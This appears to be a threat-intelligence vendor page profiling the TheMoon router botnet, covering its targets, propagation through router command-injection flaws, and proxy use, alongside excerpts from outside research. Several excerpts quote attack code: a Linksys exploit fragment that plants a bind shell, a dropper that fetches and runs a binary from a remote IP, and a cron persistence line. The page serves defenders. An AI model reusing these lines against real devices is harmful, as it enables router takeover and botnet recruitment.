TheMoon is a Linux-based IoT botnet and worm family targeting internet-exposed routers, IP cameras, and related edge devices, including Linksys and ASUS platforms. Active exploitation associated with the family was observed as early as 2013, and the family was publicly documented in 2014. It propagates by exploiting known unauthenticated remote-code-execution and command-injection vulnerabilities in vulnerable network-device firmware.
TheMoon variants are compiled for embedded router architectures, including MIPS, and deploy persistent loaders, scheduled execution, and configuration changes on compromised ASUS devices. Variants have modified device firewall rules to block competing malware and preserve operator access. The malware has used peer-to-peer communications for botnet coordination, can obtain and execute follow-on payloads, and has employed unencrypted command communications in at least one analyzed variant.
Compromised devices have been used as proxy infrastructure and have been linked to residential-proxy services including Faceless, 5socks, and Anyproxy. The resulting infrastructure has been associated with malicious authentication attempts against cloud services and SSH brute-force activity. TheMoon primarily affects unsupported or unpatched consumer and small-office/home-office networking equipment exposed to the internet.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year... Figure 1 Exploitation of CVE-2014-9583 | This bot belongs to the TheMoon family of malware... Conclusion The TheMoon family was first discovered by SANS ISC in 2014. This family targets routers and installs malware by exploiting their vulnerabilities.
the next request hits /tmUnblock.cgi, a CGI endpoint in Linksys E-series routers carrying a critical command injection vulnerability (CVE-2025-34037). While documented since 2013 and historically exploited by "TheMoon" worm, this vulnerability continues to be actively weaponized by modern botnets. | .../tmUnblock.cgi, a CGI endpoint in Linksys E-series routers carrying a critical command injection vulnerability (CVE-2025-34037). While documented since 2013 and historically exploited by "TheMoon" worm, this vulnerability continues to be actively weaponized by modern botnets...
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Het .asusrouter script wordt automatisch door de ASUSWRT-firmware aangeroepen tijdens het opstarten ... 'cru a 8ewMqdWf9K "22 17,8,16 * * * /jffs/.asusrouter"'.
ttcp_ip=-h `" . $payload . "`& ... build_packet ( $host , $port , $vuln , "/tmp/c0d3z" ) | msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 ... Attempting to get a shell... fsockopen ( $host , 4444
Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1 chmod +x .nttpd ./.nttpd
Embedded JavaScript code is extracted and sent to the command and control (C&C) server. The C&C server will execute JavaScript code and respond with a result... Bot sends a request to the C&C URL and gets a valid (shared) Google reCAPTCHA response token.
Verspreid over de verschillende shell-scripts stuurt de malware telemetrie naar de C2-server ... GET /asi.ko ... GET /asi.ok.
Deze software creëert een socks5 proxy wat vermoedelijk gebruikt wordt door actoren om malicieuze activiteiten te ontplooien.
24 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A worm historically known for exploiting the Linksys /tmUnblock.cgi vulnerability on E-series routers.
Malware infecting older Linksys and Cisco routers and used to turn them into residential proxy infrastructure.
AryStinger follows the same pattern seen in campaigns such as AVrecon, SocksEscort, and TheMoon.
Referenced historically as malware used to turn routers into residential proxies.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.